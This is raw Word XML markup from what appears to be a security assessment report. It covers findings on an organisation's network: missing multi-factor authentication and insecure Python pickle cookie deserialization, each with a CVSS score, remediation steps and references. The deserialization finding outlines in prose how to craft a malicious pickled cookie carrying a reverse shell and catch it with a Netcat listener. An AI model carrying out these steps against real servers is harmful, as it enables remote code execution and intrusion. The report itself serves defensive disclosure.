                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>M1032: Multi-Factor Authentication</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="53AB1BFB">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96CFF4" w14:textId="51E1EC0A">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326EEF3" w14:textId="497F0535">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57DA456F" w14:textId="7A2C4939">
      <w:pPr>
        <w:keepNext w:val="1"/>
        <w:keepLines w:val="1"/>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3684C02" w:rsidP="0D325B6E" w:rsidRDefault="63684C02" w14:paraId="62D42F70" w14:textId="4B669F0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3684C02" w:rsidP="0D325B6E" w:rsidRDefault="63684C02" w14:paraId="54660A64" w14:textId="6578936D">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off" w:line="279" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0"/>
        <w:jc w:val="left"/>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pPr>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="63684C02">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The APT network does not implement Multi-Factor Authentication (MFA) for users</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="1F3C93A8">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on </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="1F3C93A8">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any service</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="63684C02">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r w:rsidRPr="0D325B6E" w:rsidR="63684C02">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As a result, if an attacker can discover an account password, they will gain access to </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="206EC134">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any</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="63684C02">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D325B6E" w:rsidR="73A7FC9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service on the network without further authorization.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="6F1DBCDE" w14:textId="7621039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3684C02" w:rsidP="0D325B6E" w:rsidRDefault="63684C02" w14:paraId="59F3AF8C" w14:textId="5ED645C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3684C02" w:rsidP="0D325B6E" w:rsidRDefault="63684C02" w14:paraId="7472409C" w14:textId="3A546A8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The absence of MFA significantly increases the danger of unauthorized access to APT’s network. Successful compromise of an account can </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="01A8B483">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>led</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to data exfiltration, service </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="6D2ED947">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>disruption,</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and jeopardization of operational integrity. A privileged account being compromised can endanger the entire network, including critical cruise operations, leading to severe safety risks and</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ossible los</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of life. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="5425FC8D" w14:textId="018B584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3684C02" w:rsidP="0D325B6E" w:rsidRDefault="63684C02" w14:paraId="3C6FFDAA" w14:textId="360E1D2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3684C02" w:rsidP="0D325B6E" w:rsidRDefault="63684C02" w14:paraId="5EAEBEA5" w14:textId="4B60387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Step 1: Locate a user’s credentials</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="63684C02" w:rsidP="0D325B6E" w:rsidRDefault="63684C02" w14:paraId="1EEF6660" w14:textId="4A077A5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8624452">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Authenticate</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CC46B6A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>with</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="4CC46B6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the user</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="0A5BA465">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DD4369B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>credential</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="03D8D5C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DD4369B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and</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notice that there is no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additional</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verification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39762224" w14:textId="69751D6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3684C02" w:rsidP="0D325B6E" w:rsidRDefault="63684C02" w14:paraId="31508295" w14:textId="3521078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3684C02" w:rsidP="0D325B6E" w:rsidRDefault="63684C02" w14:paraId="43797B43" w14:textId="4CDFA01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3684C02" w:rsidP="0D325B6E" w:rsidRDefault="63684C02" w14:paraId="2F6B2EA2" w14:textId="59551167">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="112"/>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Implement multi-factor authentication</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 xml:space="preserve">, such as </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="3E020AE3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>mobil</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3E020AE3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> authenticator</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 xml:space="preserve"> verification or </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im</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b</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ase</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e-t</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im</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 xml:space="preserve">e </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 xml:space="preserve">passwords </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(TOTP)</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="3DD60554">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for all user accounts, prioritizing privileged </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accounts</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 and any publicly available systems</w:t>
      </w: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w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="63684C02" w:rsidP="0D325B6E" w:rsidRDefault="63684C02" w14:paraId="193A91A8" w14:textId="3F6CF64E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="112"/>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684C02">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Monitor and audit authentication events for failed MFA verification or MFA bypass attempts. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="775B607D" w14:textId="73B10637">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>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r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="63684C02">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3684C02" w:rsidP="0D325B6E" w:rsidRDefault="63684C02" w14:paraId="4D1A3EF3" w14:textId="77CAC8E1">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97da661c99f949ba">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="63684C02">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 Multi Factor Authentication</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="2B3DB407" w14:textId="79DE5F6B">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:dstrike w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="274F86E0" w14:textId="0F1E6CD6">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="5F0260D6" w14:textId="7971DE3E">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="34FD960A" w:rsidP="0D325B6E" w:rsidRDefault="34FD960A" w14:paraId="32E49B8D" w14:textId="2505420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34FD960A">
        <w:rPr>
          <w:rFonts w:ascii="Aptos Display" w:hAnsi="Aptos Display" w:eastAsia="Aptos Display" w:cs="Aptos Display"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="660000"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>▌</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="34FD960A">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Insecure Cookie Deserialization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3E6F1D6E">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8D1F31" w14:textId="602B291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2217B44" w14:textId="0736E75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286055D" w14:textId="207EBDC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303D4F1">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2BF901" w14:textId="7B3CBEF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2460C262" w14:textId="29775D96">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443F8928" w14:textId="5674D5A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9.3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C9268D1" w14:textId="259E7500">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29F9FCE9">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13E2E7" w14:textId="07F5F21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38443F9" w14:textId="0B8C25AC">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5C66DA5D"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4350" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:top w:sz="0"/>
              <w:left w:val="single" w:color="000000" w:themeColor="text1" w:sz="0"/>
              <w:bottom w:val="single" w:color="000000" w:themeColor="text1" w:sz="0"/>
              <w:right w:val="single" w:color="000000" w:themeColor="text1" w:sz="0"/>
            </w:tcBorders>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="114168AC"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="1AB8B4A1">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553696" w14:textId="6BE1902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B2EFBBF" w14:textId="7A8BA95B">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink w:anchor="CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" r:id="R270a54bfe1d543e9">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="70049E86">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E0012F" w14:textId="63DACF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469354" w14:textId="0F0C9DE6">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F5E2ECA" w14:textId="273B5267">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="Rb573a2a427014984">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">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0D325B6E" w:rsidTr="0D325B6E" w14:paraId="6348C314">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73905609"/>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15F9FD" w14:textId="3FBEB1D5">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BE8DFA0" w14:textId="47BDFC9B">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="R4bffcbb82a3f4725">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>M1048: Application Isolation and Sandboxing</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="389893B7" w14:textId="0B48B710">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="R34b5cf48f23a4b1f">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">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0D325B6E" w:rsidTr="0D325B6E" w14:paraId="4B9A55B2">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34C517F" w14:textId="77DD4659">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61F0D4B" w14:textId="1197ADFB">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5F3FD85C" w14:textId="32F05572">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34FD960A" w:rsidP="0D325B6E" w:rsidRDefault="34FD960A" w14:paraId="1A82F803" w14:textId="09F6D11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4FD960A" w:rsidP="0D325B6E" w:rsidRDefault="34FD960A" w14:paraId="6F8B748B" w14:textId="178D5806">
      <w:pPr>
        <w:pStyle w:val="Normal"/>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The affected website</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deserializes pickled </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="3DDA96B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Python </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objects for cookie-based authentication of users. </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This </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allows</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an</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at</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t</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c</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k</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e</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r</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D325B6E" w:rsidR="7854F67D">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to </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craft</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serialized payloads to trigger code execution on the host server</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upon </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deseri</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="3CBA3A74">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l</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i</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z</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ati</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o</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="46F16BA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n</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="34FD960A">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p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="06A200B3" w14:textId="6CBDF39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FD960A" w:rsidP="0D325B6E" w:rsidRDefault="34FD960A" w14:paraId="3E35B999" w14:textId="276EF30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4FD960A" w:rsidP="0D325B6E" w:rsidRDefault="34FD960A" w14:paraId="25D93519" w14:textId="1E8AB21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 on the host server and a loss of critical data, as attackers can </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="30BB1C18">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>have the ability to perform arbitrary, remote code execution of the backend server.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="5BDBED2B" w14:textId="65AE918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FD960A" w:rsidP="0D325B6E" w:rsidRDefault="34FD960A" w14:paraId="07CFDDFA" w14:textId="1CCDD98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4FD960A" w:rsidP="0D325B6E" w:rsidRDefault="34FD960A" w14:paraId="1B6A6654" w14:textId="6C9AA0E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the web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browser’s</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developer tools to extract the cookie.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="34FD960A" w:rsidP="0D325B6E" w:rsidRDefault="34FD960A" w14:paraId="1614F31C" w14:textId="643B298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Step 2: Craft </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="5BCD03D4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">a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malicious pickled cookie </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="2E310ED9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>that contains a reverse shell payload</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w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="34FD960A" w:rsidP="0D325B6E" w:rsidRDefault="34FD960A" w14:paraId="5BDF95FF" w14:textId="3B2415D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4620CFC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">the browser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cookie</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with the developer tools and send </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="5337840E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">a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new</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request</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web</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browser.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="34FD960A" w:rsidP="0D325B6E" w:rsidRDefault="34FD960A" w14:paraId="36818E41" w14:textId="263C0BC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Step 4: Run </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="55D1CBF4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>a N</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etcat</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Listener and wait for </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="1AF91204">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">a </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reverse shell to spawn.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="067FBB19" w14:textId="431E003E">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FD960A" w:rsidP="0D325B6E" w:rsidRDefault="34FD960A" w14:paraId="06BCBB5D" w14:textId="717BFFF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4FD960A" w:rsidP="0D325B6E" w:rsidRDefault="34FD960A" w14:paraId="0B4E097E" w14:textId="2BD16D4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4FD960A" w:rsidP="0D325B6E" w:rsidRDefault="34FD960A" w14:paraId="52149C52" w14:textId="2B6EA0A9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="113"/>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Replace insecure pickled based cookie formats with cryptographically signed or encrypted alternatives such as JSON Web Tokens (JWT) or Flask’s </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="0E37E395">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>builtin</w:t>
      </w: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 xml:space="preserve"> session cookies.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="34FD960A" w:rsidP="0D325B6E" w:rsidRDefault="34FD960A" w14:paraId="295FC215" w14:textId="79D9D461">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="113"/>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0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Isolate the web application in a docker container to reduce impact if an attacker can achieve code execution on the target server</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="0E165513" w14:textId="7EEB2000">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34FD960A" w:rsidP="0D325B6E" w:rsidRDefault="34FD960A" w14:paraId="6DE848AB" w14:textId="1A6BF5C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FD960A">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34FD960A" w:rsidP="0D325B6E" w:rsidRDefault="34FD960A" w14:paraId="08A51A72" w14:textId="06D27A98">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70C0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="Rd1945fc0f0e0484c">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="34FD960A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:i w:val="0"/>
            <w:iCs w:val="0"/>
            <w:caps w:val="0"/>
            <w:smallCaps w:val="0"/>
            <w:strike w:val="0"/>
            <w:dstrike w:val="0"/>
            <w:noProof w:val="0"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Portswigger - Insecure Deserialization</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="2BAF4015" w14:textId="28A8BDF0">
